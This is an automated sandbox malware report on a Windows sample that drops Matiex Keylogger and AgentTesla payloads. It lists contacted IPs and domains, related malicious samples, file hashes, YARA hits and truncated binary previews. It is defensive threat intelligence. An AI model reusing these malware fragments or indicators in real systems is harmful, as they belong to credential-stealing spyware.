http://ns.ado/1	LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.16.154.36	unknown	United States	13335	CLOUDFLARENETUS	false
131.186.161.70	unknown	United States	33517	DYNDNSUS	false
199.193.7.228	unknown	United States	22612	NAMECHEAP-NETUS	false
172.67.188.154	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339499
Start date:	14.01.2021
Start time:	07:58:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	B6LNCKjOGt5EmFQ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@25/14@49/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.2% (good quality ratio 0.8%) Quality average: 49.8% Quality standard deviation: 36%
HCA Information:	Successful, ratio: 99% Number of executed functions: 151 Number of non-executed functions: 17
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 92.122.144.200, 13.88.21.125, 67.27.157.126, 67.26.139.254, 67.27.159.254, 8.248.145.254, 8.253.204.120, 51.11.168.160, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.104.139.180, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:00:18	API Interceptor	2x Sleep call for process: B6LNCKjOGt5EmFQ.exe modified
08:00:45	API Interceptor	24x Sleep call for process: Pictures.exe modified
08:00:51	API Interceptor	274x Sleep call for process: PO2345714382021.exe modified
08:00:56	API Interceptor	875x Sleep call for process: PO456724392021.exe modified
08:00:59	API Interceptor	1x Sleep call for process: dw20.exe modified
08:01:07	API Interceptor	836x Sleep call for process: LOGO AND PICTURES.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.16.154.36	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	INQUIRY.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	c9o0CtTIYT.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	6JLHKYvboo.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	khJdbt0clZ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	ZMOKwXqVHO.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	5Av43Q5IXd.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	8oaZfXDstn.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	9vdouqRTh3.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	M9RhKQ1G91.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	0CyK3Y7XBs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	pwYhlZGMa6.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Vll6ZcOkEQ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	oLHQIQAI3N.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	YrHUxpftPs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	WuGzF7ZJ7P.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	cj9weNQmT2.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	lk5M5Q97c3.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	2v7Vtqfo81.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Enquiry_pdf.exe	Get hash	malicious	Browse	whatismyipaddress.com/
131.186.161.70	wjSwL3KItA.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PO_RFQ_2021_12_01.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	BxiS9KHIxj.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	04XP8gXrF7.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	F-007331.doc	Get hash	malicious	Browse	checkip.dyndns.org/
	Quotation.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	F6D24k8j9o.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	umOXxQ9PFS.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	0d7Kt71o8B.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	bank Acct Numbr-pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Y17wLTA3DX.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	0908000090000.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Purchase list- Karim Al-Dar Trading .exe	Get hash	malicious	Browse	checkip.dyndns.org/
	e8Ni2BqgDy.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	N5BJom1Uof.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	FACTURA DE PROFORMA.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Detalles del banco.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	aral#U0131k---- ekstrenizz.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	t0xy1m153o.exe	Get hash	malicious	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
whatismyipaddress.com	NDt93WWQwd089H7.exe	Get hash	malicious	Browse	104.16.155.36
	JkhR5oeRHA.exe	Get hash	malicious	Browse	66.171.248.178
	PURCHASE ORDER.exe	Get hash	malicious	Browse	104.16.155.36
	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	104.16.154.36
	INQUIRY.exe	Get hash	malicious	Browse	104.16.154.36
	Prueba de pago.exe	Get hash	malicious	Browse	104.16.155.36
	879mgDuqEE.jar	Get hash	malicious	Browse	66.171.248.178
	remittance1111.jar	Get hash	malicious	Browse	66.171.248.178
	879mgDuqEE.jar	Get hash	malicious	Browse	66.171.248.178
	remittance1111.jar	Get hash	malicious	Browse	66.171.248.178
	https://my-alliances.co.uk/	Get hash	malicious	Browse	66.171.248.178
	c9o0CtTIYT.exe	Get hash	malicious	Browse	104.16.154.36
	mR3CdUkyLL.exe	Get hash	malicious	Browse	104.16.155.36
	6JLHKYvboo.exe	Get hash	malicious	Browse	104.16.155.36
	jSMd8npgmU.exe	Get hash	malicious	Browse	104.16.155.36
	khJdbt0clZ.exe	Get hash	malicious	Browse	104.16.154.36
	ZMOKwXqVHO.exe	Get hash	malicious	Browse	104.16.154.36
	5Av43Q5IXd.exe	Get hash	malicious	Browse	104.16.154.36
	8oaZfXDstn.exe	Get hash	malicious	Browse	104.16.154.36
	RXk6PjNTN8.exe	Get hash	malicious	Browse	104.16.155.36
freegeoip.app	IMG-0641.doc	Get hash	malicious	Browse	104.21.19.200
	a5T7dTsG4U.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	104.21.19.200
	80Iki3DsHA.exe	Get hash	malicious	Browse	172.67.188.154
	QPR-1064.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	IMG_2021_01_13_1_RFQ_PO_1832938.doc	Get hash	malicious	Browse	104.28.5.151
	IMG_2021_01_13_1_RFQ_PO_1832938.exe	Get hash	malicious	Browse	104.28.4.151
	09000000000000h.exe	Get hash	malicious	Browse	172.67.188.154
	PO-5042.exe	Get hash	malicious	Browse	104.28.4.151
	onYLLDPXswyCVZu.exe	Get hash	malicious	Browse	104.28.4.151
	PO-75013.exe	Get hash	malicious	Browse	104.28.4.151
	ZwFwevQtlv.exe	Get hash	malicious	Browse	172.67.188.154
	ssDV3d9O9o.exe	Get hash	malicious	Browse	172.67.188.154
	wjSwL3KItA.exe	Get hash	malicious	Browse	104.28.4.151
	SecuriteInfo.com.Generic.mg.5a4b41327cabca49.exe	Get hash	malicious	Browse	104.28.5.151
	TD-10057.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	172.67.188.154
	FedExAWB 772584418730.doc	Get hash	malicious	Browse	172.67.188.154
	TD-10057.doc	Get hash	malicious	Browse	172.67.188.154
	ndSscoDob9.exe	Get hash	malicious	Browse	104.28.4.151
smtp.privateemail.com	SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe	Get hash	malicious	Browse	199.193.7.228
	DHL-Address.xlsx	Get hash	malicious	Browse	199.193.7.228
	shipping-document.xlsx	Get hash	malicious	Browse	199.193.7.228
	iVUeQOg6LO.exe	Get hash	malicious	Browse	199.193.7.228
	SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exe	Get hash	malicious	Browse	199.193.7.228
	DHL-document.xlsx	Get hash	malicious	Browse	199.193.7.228
	wCRnCAMZ3yT8BQ2.exe	Get hash	malicious	Browse	199.193.7.228
	Mj1eX5GWJxDRnuk.exe	Get hash	malicious	Browse	199.193.7.228
	SecuriteInfo.com.Trojan.Inject4.6535.8815.exe	Get hash	malicious	Browse	199.193.7.228
	shipping document.xlsx	Get hash	malicious	Browse	199.193.7.228
	SecuriteInfo.com.Trojan.Inject4.6512.28917.exe	Get hash	malicious	Browse	199.193.7.228
	p72kooG5ak.exe	Get hash	malicious	Browse	199.193.7.228
	additional items.xlsx	Get hash	malicious	Browse	199.193.7.228
	swift copy 1f354972.exe	Get hash	malicious	Browse	199.193.7.228
	DB_DHL_AWB_00117980920AD.exe	Get hash	malicious	Browse	199.193.7.228
	Payment Advice - Advice Ref[G20376302776].pptx.exe	Get hash	malicious	Browse	199.193.7.228
	Payment Reminder & SOA 202020121158.exe	Get hash	malicious	Browse	199.193.7.228
	kg.exe	Get hash	malicious	Browse	199.193.7.228
	logo.exe	Get hash	malicious	Browse	199.193.7.228
	Pictures.exe	Get hash	malicious	Browse	199.193.7.228

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	NEW ORDER_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	IMG-0641.doc	Get hash	malicious	Browse	104.21.19.200
	n1W2zlEddS.exe	Get hash	malicious	Browse	104.21.15.4
	a5T7dTsG4U.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	104.21.19.200
	80Iki3DsHA.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.Trojan.GenericKD.36094879.31571.exe	Get hash	malicious	Browse	104.26.3.223
	Notice_Admin_Johnstoncompanies_8578.htm	Get hash	malicious	Browse	172.67.70.208
	JdtN8nIcLi8RQOi.exe	Get hash	malicious	Browse	104.18.45.60
	Chrome.exe	Get hash	malicious	Browse	162.159.135.232
	QPR-1064.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Matrix.exe	Get hash	malicious	Browse	172.67.134.127
	JAAkR51fQY.exe	Get hash	malicious	Browse	104.21.13.175
	cremocompany-Invoice_216083-xlsx.html	Get hash	malicious	Browse	104.16.19.94
	VANGUARD PAYMENT ADVICE.htm	Get hash	malicious	Browse	104.31.67.162
	IMG_2021_01_13_1_RFQ_PO_1832938.doc	Get hash	malicious	Browse	104.28.5.151
	IMG_2021_01_13_1_RFQ_PO_1832938.exe	Get hash	malicious	Browse	104.28.4.151
	sample20210113-01.xlsm	Get hash	malicious	Browse	104.24.124.127
	Byrnes Gould PLLC.odt	Get hash	malicious	Browse	104.16.19.94
	aNmkT4KLJX.exe	Get hash	malicious	Browse	104.23.98.190
DYNDNSUS	IMG-0641.doc	Get hash	malicious	Browse	216.146.43.70
	a5T7dTsG4U.exe	Get hash	malicious	Browse	162.88.193.70
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	162.88.193.70
	80Iki3DsHA.exe	Get hash	malicious	Browse	162.88.193.70
	QPR-1064.pdf.exe	Get hash	malicious	Browse	216.146.43.71
	IMG_2021_01_13_1_RFQ_PO_1832938.doc	Get hash	malicious	Browse	131.186.113.70
	IMG_2021_01_13_1_RFQ_PO_1832938.exe	Get hash	malicious	Browse	216.146.43.71
	09000000000000h.exe	Get hash	malicious	Browse	216.146.43.70
	PO-5042.exe	Get hash	malicious	Browse	216.146.43.71
	onYLLDPXswyCVZu.exe	Get hash	malicious	Browse	216.146.43.70
	PO-75013.exe	Get hash	malicious	Browse	162.88.193.70
	ZwFwevQtlv.exe	Get hash	malicious	Browse	216.146.43.71
	ssDV3d9O9o.exe	Get hash	malicious	Browse	216.146.43.71
	wjSwL3KItA.exe	Get hash	malicious	Browse	131.186.161.70
	SecuriteInfo.com.Generic.mg.5a4b41327cabca49.exe	Get hash	malicious	Browse	216.146.43.70
	TD-10057.exe	Get hash	malicious	Browse	216.146.43.70
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	131.186.161.70
	FedExAWB 772584418730.doc	Get hash	malicious	Browse	131.186.113.70
	TD-10057.doc	Get hash	malicious	Browse	162.88.193.70
	ndSscoDob9.exe	Get hash	malicious	Browse	216.146.43.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	a5T7dTsG4U.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	172.67.188.154
	80Iki3DsHA.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.Trojan.GenericKD.36094879.31571.exe	Get hash	malicious	Browse	172.67.188.154
	QPR-1064.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	IMG_2021_01_13_1_RFQ_PO_1832938.exe	Get hash	malicious	Browse	172.67.188.154
	aNmkT4KLJX.exe	Get hash	malicious	Browse	172.67.188.154
	09000000000000h.exe	Get hash	malicious	Browse	172.67.188.154
	PO-5042.exe	Get hash	malicious	Browse	172.67.188.154
	Geno_Quotation,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	onYLLDPXswyCVZu.exe	Get hash	malicious	Browse	172.67.188.154
	PO-75013.exe	Get hash	malicious	Browse	172.67.188.154
	ZwFwevQtlv.exe	Get hash	malicious	Browse	172.67.188.154
	ssDV3d9O9o.exe	Get hash	malicious	Browse	172.67.188.154
	wjSwL3KItA.exe	Get hash	malicious	Browse	172.67.188.154
	Invoice-ID43739424297.vbs	Get hash	malicious	Browse	172.67.188.154
	Company Docs.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.Generic.mg.5a4b41327cabca49.exe	Get hash	malicious	Browse	172.67.188.154
	TD-10057.exe	Get hash	malicious	Browse	172.67.188.154
	NKP210102-NIT-SC2.exe	Get hash	malicious	Browse	172.67.188.154

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_pictures.exe_c756fdb369d16caee6eb4c4fc55eace42746ab1_00000000_1a3a4dea\Report.wer Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	16930
Entropy (8bit):	3.7534088968281503
Encrypted:	false
SSDEEP:	192:I+ugaMVvaKsn9fbeN9M2v1zzvSXk0ZKjBIcQry/u7snS274ItIn:9ugjaEdvh/sy/u7snX4Itg
MD5:	241EF4951F1724F8D1314BBFBB87465D
SHA1:	6BCBF070048674493FEBB07C204D05E998129610
SHA-256:	8EB667042376D717A87470D2AE0D383656CFB70BFE687BCCC80676683A25DB1D
SHA-512:	91AA5EF75A30C1FDF0DBE928849A484D82381F6491F99B7C7A1192786C66DDFC154E1D6F722C1924C274F32FC5F42EBE2161E42A1EF33CE764A073C6967A51D7
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.1.1.3.6.4.8.9.6.7.0.7.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.5.1.1.3.6.4.9.5.1.3.9.4.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.8.4.6.b.2.8.-.c.b.8.e.-.4.d.0.5.-.b.c.9.4.-.d.8.c.2.b.c.7.e.c.a.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.0.-.0.0.0.1.-.0.0.1.7.-.f.c.f.e.-.1.4.6.8.8.e.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.4.1.7.1.9.0.0.e.4.d.1.2.9.1.c.7.a.7.c.d.b.3.3.a.d.c.6.5.5.e.c.b.1.2.3.3.4.a.4.f.!.P.i.c.t.u.r.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.2././.0.9.:.1.0.:.5.1.:.3.2.!.0.!.P.i.c.t.u.r.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER23EC.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	7660
Entropy (8bit):	3.6954137341102586
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi+R6g4Oe6YAY6FOqVgmfZ61S4Cp1l41fz3m:RrlsNio6n6YX64YgmfQ1Shlifa
MD5:	752C895F9DCD8F46A421ED01FC3D9137
SHA1:	A0E2791563BE980CE3A52637CA0E67A5CA39AA77
SHA-256:	3EBD2A9B184072C0007CA004F0623800CA3884EDCE089E48F0FD80B57373B6D5
SHA-512:	177B74E6B738AA8AC40C5F95B2D488CDE311F72C76DAE55493665140F9396F9489FE64B5B21D73A310EA037C98B8650F2A769EBAE1C93A928BB23EB929467690
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2525.tmp.xml Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.439678899414447
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI9+gWSC8Bn8fm8M4JFKC5FTso+q8v1XYt/xrvVXKd:uITfcBZSNqJFKvoK1YtJrvVXKd
MD5:	B3C65F177C1DEC134F2D225E3A86BB21
SHA1:	83F25E548BD0226D94AC22C57E582CBDEED12DFF
SHA-256:	B83847FA914868ED4AE188E38B5B9859232C7FA721DD1E979AA8476C683D2A8A
SHA-512:	88AE1BCF79CD03EA0B0A8502DB64431364BAE67ECD0375729D0BD26ACBF1D9E4C8079BAB37ADD7237383C0F1191F0883505171A8E7654534B15B7666CAEF056A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816551" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B6LNCKjOGt5EmFQ.exe.log Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	456192
Entropy (8bit):	5.4162986566993
Encrypted:	false
SSDEEP:	3072:gbG/+hpzWouj0ce9wDRlZg80CEZU8BVfCXEMRWTjwNs5Pu:gC/+7Wouj7e6DRlZjYfCXEsWTj+qu
MD5:	D9001138C5119D936B70BF77E136AFBE
SHA1:	CFA2DBFF8527715EAAD00E91BD8955A8FFFC1224
SHA-256:	9AE5EF3FD4FEEA105C1ED3F1E69FD4FA328E8F29F1937097280F7EEE7F8D749E
SHA-512:	0187EC1EDE0022DAA4021A72D871CA0B7694B312BDBA1C31BF3C0667CE0255C51E9880170A4B5226E63C2BF48F53B8071F12B08C106B6B82EB1D5389C3F9D576
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......H...Xy..........@'...h.....................................................................................................................................................................RNK\ZJO@F.EYC.G.IOYKJ._R_CEESEPPlj}ez\|"hzfSn`ssdh~DNwq//M\`tdv`\|..;.....4......Ewqus._/.....V>..%9%(:&##b?`LLJN.56(,*:.}.2=4lwY_.............................................................................................................A.{YOLI..qAL.tTDY^..v^NY

C:\Users\user\AppData\Local\Temp\PO2345714382021.exe Download File
Process:	C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	220672
Entropy (8bit):	6.060576428712888
Encrypted:	false
SSDEEP:	3072:zVQsV4phvec6kzCuJ5ufEUJdYi68Nl2xQzMfNlpmgVQoKPMXT3QECAJrYULCqv:zN49CaUXxN0AWNvmHoKPW3B0U
MD5:	9B79DE8E3AD21F14E71E55CFA6AE4727
SHA1:	3C2066345874FEBAFE281BBDE952D4F32D2ED53A
SHA-256:	56BD25ACDB97CE17F8351B926C48A4F63E348C40F6C5913219B0745D99F6B31D
SHA-512:	F922BE9228BAA1DAB85A5CFACFAFBB6E8C919009BB843B6CDBA0C2E24F6ABFCBE26417046BE248CCB41F820111633FDEE7C6EA5865A2FBCC3BCF22C52A7208E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.._.................V...........u... ........@.. ....................................@..................................t..S.................................................................................... ............... ..H............text....U... ...V.................. 